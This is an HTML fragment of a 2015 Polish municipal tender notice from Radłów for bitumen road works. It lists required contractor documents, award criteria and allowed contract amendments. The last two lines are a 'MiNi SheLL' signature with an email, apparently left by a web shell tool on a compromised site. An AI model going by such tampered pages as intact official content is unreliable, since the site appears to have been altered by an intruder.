<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykaz będzie zawierał co najmniej 2 roboty budowlane o podobnym charakterze (wykonanie lub remont dróg o nawierzchni bitumicznej) odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia, o wartości co najmniej 800 000 zł brutto, każda;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca polegając na zasobach innych podmiotów, na zasadach określonych w art. 26. ust. 2b ustawy, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 8.4.1 i 8.4.2 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione odpowiednio w terminach określonych w pkt 8.4.1 i 8.4.2 SIWZ. Inne dokumenty i oświadczenia, które Wykonawca zobowiązany jest dołączyć do oferty. 1.Oferta na wykonanie zamówienia wg. wzoru określonego w Załączniku nr 1 do SIWZ. 2. Uproszczone kosztorysy ofertowe. 3. Dokument potwierdzający zabezpieczenie oferty akceptowaną formą wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Długość okresu gwarancji jakości - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje, z uwzględnieniem art. 144 ust.1 ustawy, możliwość dokonania zmian umowy:
1)  terminu realizacji zamówienia w przypadku:
        a)    wystąpienia udokumentowanych przez Wykonawcę, nie zawinionych przez niego opóźnień 
       w dostawie materiałów, sprzętów lub urządzeń służących wykonaniu Przedmiotu umowy, 
   b) wystąpienia przerw w realizacji umowy z przyczyn leżących po stronie Zamawiającego, po  
        pisemnym stwierdzeniu tego faktu przez Zamawiającego,
   c)  zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych,  
        poszczególnych elementów robót niż przewidzianych w dokumentacji projektowej,
         2) innych postanowień umowy w przypadkach:
                 a) zmian wynikających z przekształceń własnościowych,
                 b) zmian organizacyjno-technicznych,
                 c) zmiany adresów,
                 d) obniżenia wynagrodzenia Wykonawcy,
        e) wykonania Przedmiotu umowy w części w sposób lub przy użyciu materiałów lub urządzeń gwarantujących lepszą realizację umowy, przy zachowaniu ceny złożonej oferty,
     f)  zmiany stawek podatku od towarów i usług,
     g)  zmiany nazwy zadania,
     h)  zmiany podwykonawców, kierowników robót, kierownika  budowy, inspektorów nadzoru
     i)  wystąpienia siły wyższej mającej istotny wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminaradlow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Radłowie ul. Kolejowa 7 33-130 Radłów pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2015 godzina 12:00, miejsce: Urząd Miejski w Radłowie ul. Kolejowa 7 33-130 Radłów, Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane z Ministerstwa Administracji i Cyfryzacji, w ramach usuwania skutków klęsk żywiołowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com